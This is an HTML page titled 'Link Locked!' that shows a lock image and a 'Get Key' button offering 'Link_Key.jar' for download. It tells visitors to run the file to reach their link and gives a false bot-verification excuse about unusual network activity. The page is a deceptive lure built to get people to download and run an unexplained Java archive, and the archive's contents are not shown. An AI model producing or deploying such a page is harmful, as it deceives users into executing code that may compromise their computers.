
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Link Locked!</title>
  <link href="https://fonts.googleapis.com/css?family=Droid+Sans|Raleway" rel="stylesheet">
  <style>
    .wrap {
      text-align: center;
    }
    #title {
      font-size: 80px;
      font-weight: bold;
      font-family: 'Raleway', sans-serif;
    }

    #keytext {
      font-family: 'Droid Sans', sans-serif;
    }

    #bot {
      font-family: 'Droid Sans', sans-serif;
      font-size: 20px;
      position: absolute;
      bottom: 0px;
      left: 400px;
    }

    .btn {
      -webkit-border-radius: 6;
      -moz-border-radius: 6;
      border-radius: 6px;
      font-family: Courier New;
      color: #ffffff;
      font-size: 20px;
      background: #25cfdb;
      padding: 10px 20px 10px 20px;
      text-decoration: none;
    }

  .btn:hover {
      background: #3cb0fd;
      background-image: -webkit-linear-gradient(top, #3cb0fd, #3498db);
      background-image: -moz-linear-gradient(top, #3cb0fd, #3498db);
      background-image: -ms-linear-gradient(top, #3cb0fd, #3498db);
      background-image: -o-linear-gradient(top, #3cb0fd, #3498db);
      background-image: linear-gradient(to bottom, #3cb0fd, #3498db);
      text-decoration: none;
  }
  </style>
</head>
<body>
  <div class="wrap">
    <h1 id="title">Link Locked!</h1>
    <img src="https://cdn.pixabay.com/photo/2013/07/12/18/03/lock-152879_960_720.png" width="100px" height="100px" alt="">
    <br><br><br><a download="Link_Key.jar" href="Link_Key.jar" class="btn">Get Key</a>
    <br><br><p id="locktext">Run this key to access your link.</p>
    <p id="bot">Why am I seeing this? We have detected unusual activity from your network, and you need to verify that you are not a robot.</p>
  </div>
</body>
</html>
